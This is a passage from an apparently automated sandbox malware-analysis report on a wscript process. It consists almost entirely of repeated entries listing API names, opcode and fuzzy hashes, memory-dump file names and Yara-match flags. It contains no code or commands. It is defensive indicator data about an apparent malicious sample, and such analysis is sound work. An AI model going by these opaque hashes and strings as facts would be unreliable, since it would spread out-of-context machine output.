                                                                                                          • Instruction Fuzzy Hash: 6C90023560590012B140B158488854640999BE1306B55C021F042D554C8A14DA566361
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: b59815b07b342608f07843d3bad8b1a2f585011f4c5fe2c115fec6818b131126
                                                                                                          • Instruction ID: 05e97b15367856d898710a31a31e9b86ccbabdca0622fa63043af058f8c06e8d
                                                                                                          • Opcode Fuzzy Hash: b59815b07b342608f07843d3bad8b1a2f585011f4c5fe2c115fec6818b131126
                                                                                                          • Instruction Fuzzy Hash: FC90023520150402F100B598540C64600998BE1306F55D021B502D555EC665D9917131
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: b19fe59af5e765d34c4514df7d587a808087340d078145b04e188e2da473bf8c
                                                                                                          • Instruction ID: 32a69845a73a55f2236f53859994e098222a6f1d49d67d973dcb9b5c337a1b79
                                                                                                          • Opcode Fuzzy Hash: b19fe59af5e765d34c4514df7d587a808087340d078145b04e188e2da473bf8c
                                                                                                          • Instruction Fuzzy Hash: 8D90023520158802F110B158840874A00998BD1306F59C421B442D658D8695D9917121
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 094a072cc4411cae9638534645ff4e4b37d0f3cf916f8729c22c75c13265378c
                                                                                                          • Instruction ID: 15433f4b2c903868ecef30e1075d3c4f3dbf7810c0c6a74c38be2bd1dc5cb2db
                                                                                                          • Opcode Fuzzy Hash: 094a072cc4411cae9638534645ff4e4b37d0f3cf916f8729c22c75c13265378c
                                                                                                          • Instruction Fuzzy Hash: 8B90023520150842F100B1584408B4600998BE1306F55C026B012D654D8615D9517521
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 4125b47c2240621961fe87f14b06f5455d3acd6be21c44a40256cbdbb4060d6d
                                                                                                          • Instruction ID: d87cb9daf743411c8fbe010dcda1888311ed57527ae39bc528910d0aa469f442
                                                                                                          • Opcode Fuzzy Hash: 4125b47c2240621961fe87f14b06f5455d3acd6be21c44a40256cbdbb4060d6d
                                                                                                          • Instruction Fuzzy Hash: F2900225242541527545F1584408507409A9BE1246795C022B141D950C8526E956E621
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 66f72bec280a2429cc99a972cbe0e963076c0cacf65e47a9ff6c179ccc4a1f81
                                                                                                          • Instruction ID: 2cbc59cad12b4ebdb91783d385c8c570b7b8ba7c3dfab735aae5b15ac7ac6ca5
                                                                                                          • Opcode Fuzzy Hash: 66f72bec280a2429cc99a972cbe0e963076c0cacf65e47a9ff6c179ccc4a1f81
                                                                                                          • Instruction Fuzzy Hash: A290023520150413F111B1584508707009D8BD1246F95C422B042D558D9656DA52B121
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: a1718c965a1d7728e12b257630bd79188fe3f76704718946c68ba188b666957e
                                                                                                          • Instruction ID: 7b5eab76867c488da11d49bb601b270bd52c74994ae361bdcf022f1177569383
                                                                                                          • Opcode Fuzzy Hash: a1718c965a1d7728e12b257630bd79188fe3f76704718946c68ba188b666957e
                                                                                                          • Instruction Fuzzy Hash: F490022D21350002F180B158540C60A00998BD2207F95D425B001E558CC915D9696321
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 8daf10fff9185ccc284fe6a898153ff2e231d33f47d0cadccb41ae72076538d1
                                                                                                          • Instruction ID: ef9b1603f0fd529374d7fcf1be1e20f12edf57f521226542eec27907cf9fc976
                                                                                                          • Opcode Fuzzy Hash: 8daf10fff9185ccc284fe6a898153ff2e231d33f47d0cadccb41ae72076538d1
                                                                                                          • Instruction Fuzzy Hash: 8C90022530150003F140B158541C6064099DBE2306F55D021F041D554CD915D9566222
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 381fb93a57c549f745aa6d291aa1079b33ffba4668fe1e775452f7fa0a94e1c3
                                                                                                          • Instruction ID: 2a835545db4eaeb1255d3eecb9acddbd267db113a20f0bdba0822a0c52f323f1
                                                                                                          • Opcode Fuzzy Hash: 381fb93a57c549f745aa6d291aa1079b33ffba4668fe1e775452f7fa0a94e1c3
                                                                                                          • Instruction Fuzzy Hash: F390022560150502F101B1584408616009E8BD1246F95C032B102D555ECA25DA92B131
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 7052e4642c8091d75f508e327e87c7e81f9b92f24af250a7f1a13cf040e750cd
                                                                                                          • Instruction ID: 92e3f3577a2279fb7289dc435e8fc025db9f248e752cf53045ce07699f181993
                                                                                                          • Opcode Fuzzy Hash: 7052e4642c8091d75f508e327e87c7e81f9b92f24af250a7f1a13cf040e750cd
                                                                                                          • Instruction Fuzzy Hash: EA90026520190403F140B558480860700998BD1307F55C021B206D555E8A29DD517135
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 603e875f67359ad870d6872ac59b4cbc3da28510b5525cfdadb222b97ade7458
                                                                                                          • Instruction ID: 02d24faf77bb8730c8170e0bfd94882f3ef49eae78d25f3c4d1aa7128074f102
                                                                                                          • Opcode Fuzzy Hash: 603e875f67359ad870d6872ac59b4cbc3da28510b5525cfdadb222b97ade7458
                                                                                                          • Instruction Fuzzy Hash: A5900225601500426140B16888489064099AFE2216755C131B099D550D8559D9656665
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: a59443d9e54098bd722ba3ea460a7a5e9980aa4273f2a3e5c372d507639236d3
                                                                                                          • Instruction ID: 682e56368491663532db36b3adf5415e5fe44bd4d571c542986b1aff15b6bace
                                                                                                          • Opcode Fuzzy Hash: a59443d9e54098bd722ba3ea460a7a5e9980aa4273f2a3e5c372d507639236d3
                                                                                                          • Instruction Fuzzy Hash: 06900225211D0042F200B5684C18B0700998BD1307F55C125B015D554CC915D9616521
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 7e444177739090042a6602d9c47253f702a3c92cb0fd6b47d7e5a6246afaed69
                                                                                                          • Instruction ID: 2a27540249f5b96e09f7bb82b790fea2b2a6c6e52b9388d914de7ca5dad37b75
                                                                                                          • Opcode Fuzzy Hash: 7e444177739090042a6602d9c47253f702a3c92cb0fd6b47d7e5a6246afaed69
                                                                                                          • Instruction Fuzzy Hash: 1190026534150442F100B1584418B060099CBE2306F55C025F106D554D8619DD527126
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: f49779acb9f8571defdf522b6dcad181f6b930d973a21ec2e0f52afca32d4de2
                                                                                                          • Instruction ID: d7832cfe260bf2853272903cbc0c9e04bb7901a72180a04cba077bc8c7b5dbe0
                                                                                                          • Opcode Fuzzy Hash: f49779acb9f8571defdf522b6dcad181f6b930d973a21ec2e0f52afca32d4de2
                                                                                                          • Instruction Fuzzy Hash: 6E900229211500032105F558070850700DA8BD6356355C031F101E550CD621D9616121
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 7706dfb10c37ab668e8ab13c3916c9410b0d3e8ddc7029bb261159622eccd8f2
                                                                                                          • Instruction ID: 4ea940ed3bf7aa0802d8bc6d1361f31e464b87730cdbd9c18c9ce0d08a9a8277
                                                                                                          • Opcode Fuzzy Hash: 7706dfb10c37ab668e8ab13c3916c9410b0d3e8ddc7029bb261159622eccd8f2
                                                                                                          • Instruction Fuzzy Hash: A0900229221500022145F558060850B04D99BD7356395C025F141F590CC621D9656321
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: d6fe3b8ad5f6842cc944f6667b82e96ddcd3fbd2c7e6b358efd17add6bfb94f3
                                                                                                          • Instruction ID: bf8d56e5a48780fc276ac3b4e8890e72213f1e8cd8459b922a663964e8b5fe33
                                                                                                          • Opcode Fuzzy Hash: d6fe3b8ad5f6842cc944f6667b82e96ddcd3fbd2c7e6b358efd17add6bfb94f3
                                                                                                          • Instruction Fuzzy Hash: E190023560550802F150B158441874600998BD1306F55C021B002D654D8755DB5576A1
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: f73e88692c071c40ccf8e209cc945eaea87f61d9e0d9352f14024afc5d9f22b9
                                                                                                          • Instruction ID: f3b4cfe42fe593dd02e0d21db49cfe3a2b1bb8162ec11492a5197e08d0d409ce
                                                                                                          • Opcode Fuzzy Hash: f73e88692c071c40ccf8e209cc945eaea87f61d9e0d9352f14024afc5d9f22b9
                                                                                                          • Instruction Fuzzy Hash: 8490023520150802F180B158440864A00998BD2306F95C025B002E654DCA15DB5977A1
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 34af614127c6e765d745dbbcf0312225a4ea1a3ca45ef4e91e522eddbf650f1e
                                                                                                          • Instruction ID: f328707171a0b13ed6f1cfb786cdf0d24423207dd62f5960e1de45173e15f379
                                                                                                          • Opcode Fuzzy Hash: 34af614127c6e765d745dbbcf0312225a4ea1a3ca45ef4e91e522eddbf650f1e
                                                                                                          • Instruction Fuzzy Hash: 0E90023520554842F140B1584408A4600A98BD130AF55C021B006D694D9625DE55B661
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 745015c82b38945b0c543a2d1f7e5c1d94fb334cf50412d16bb753cc398ac534
                                                                                                          • Instruction ID: 90b67fc3f81dc1662abd4ec666e29b1d0feca50b61a482225eaf67e709d0e88f
                                                                                                          • Opcode Fuzzy Hash: 745015c82b38945b0c543a2d1f7e5c1d94fb334cf50412d16bb753cc398ac534
                                                                                                          • Instruction Fuzzy Hash: E3900265202500036105B1584418616409E8BE1206B55C031F101D590DC525D9917125
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: 5a69a2cb7cfc68cf02ffcf726f6314516f467fc0d5d853e2cc74ac2df1f8be99
                                                                                                          • Instruction ID: 1e02c20a5a9b4611bbb88f2d5404566f0f3a00e754b2012a9275ca5bef1e98f6
                                                                                                          • Opcode Fuzzy Hash: 5a69a2cb7cfc68cf02ffcf726f6314516f467fc0d5d853e2cc74ac2df1f8be99
                                                                                                          • Instruction Fuzzy Hash: CD90023560560402F100B158451870610998BD1206F65C421B042D568D8795DA5175A2
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4590842876.00000000048B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048B0000, based on PE: true
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.00000000049DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          • Associated: 00000008.00000002.4590842876.0000000004A4E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_48b0000_wscript.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitializeThunk
                                                                                                          • String ID:
                                                                                                          • API String ID: 2994545307-0
                                                                                                          • Opcode ID: be1a80fcaa42b92b21bb0ae27d2f16d1948b80f3739db6d2b2a7a0b7721d0e2d
                                                                                                          • Instruction ID: 0e82043fb4f8e136a852e90bd99a0e9ffe9a13b303de732b5c755af715491023
                                                                                                          • Opcode Fuzzy Hash: be1a80fcaa42b92b21bb0ae27d2f16d1948b80f3739db6d2b2a7a0b7721d0e2d
                                                                                                          • Instruction Fuzzy Hash: FA90022524555102F150B15C44086164099ABE1206F55C031B081D594D8555D9557221
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_750000_wscript.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: InitializeUninitialize
                                                                                                          • String ID: @J7<
                                                                                                          • API String ID: 3442037557-2016760708
                                                                                                          • Opcode ID: 07dc37aed40d42fde5e40e0e6d38a626abe37d2bb44dd8bc649eeb820b13b265
                                                                                                          • Instruction ID: d87644ef60684c2db91efcee5bceaa9c2a09237d8eef7c64db164329ac07ccc0
                                                                                                          • Opcode Fuzzy Hash: 07dc37aed40d42fde5e40e0e6d38a626abe37d2bb44dd8bc649eeb820b13b265
                                                                                                          • Instruction Fuzzy Hash: E73134B5A0060A9FDB10DFD8D8809EFB7B9FF88304B108569E916E7214D775EE45CBA0
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_750000_wscript.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: InitializeUninitialize
                                                                                                          • String ID: @J7<
                                                                                                          • API String ID: 3442037557-2016760708
                                                                                                          • Opcode ID: e8a5296b95f409f54c070a06c7eda8feffda0ac5e598b798517ff85c947b1cdf
                                                                                                          • Instruction ID: 9ad5a1dd05c5c80e185f5631c70dfbc27be9987fea9c60dbfa359ce6594cb810
                                                                                                          • Opcode Fuzzy Hash: e8a5296b95f409f54c070a06c7eda8feffda0ac5e598b798517ff85c947b1cdf
                                                                                                          • Instruction Fuzzy Hash: AF3112B5A0060A9FDB10DFD8D8809EFB7B9FF88304B108569E916E7214D775EE45CBA0
                                                                                                          APIs
                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 00779A8C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_750000_wscript.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: FreeHeap
                                                                                                          • String ID: A4v
                                                                                                          • API String ID: 3298025750-2354387227
                                                                                                          • Opcode ID: 0a10d6433b35e32f4ef85d94afe1d23d7cf17eb97beecc91f61264520daa96a1
                                                                                                          • Instruction ID: 2daaa753838e1f721c1043f329feceb4fbb0ff850aeebc18863bd9bfa4839197
                                                                                                          • Opcode Fuzzy Hash: 0a10d6433b35e32f4ef85d94afe1d23d7cf17eb97beecc91f61264520daa96a1
                                                                                                          • Instruction Fuzzy Hash: F7E06D75200204BBDA10EE58DC49FDB73ACEFC9711F004018FA08A7242DA70B9118BB4
                                                                                                          APIs
                                                                                                          • Sleep.KERNELBASE(000007D0), ref: 00773D4B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000008.00000002.4581614710.0000000000750000.00000040.80000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_8_2_750000_wscript.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID: Sleep
                                                                                                          • String ID: wininet.dll
                                                                                                          • API String ID: 3472027048-3354682871
                                                                                                          • Opcode ID: 700bccd0693fc6de2cb298a2d104f14b142d86285ec905ff9060625a6a4abde7
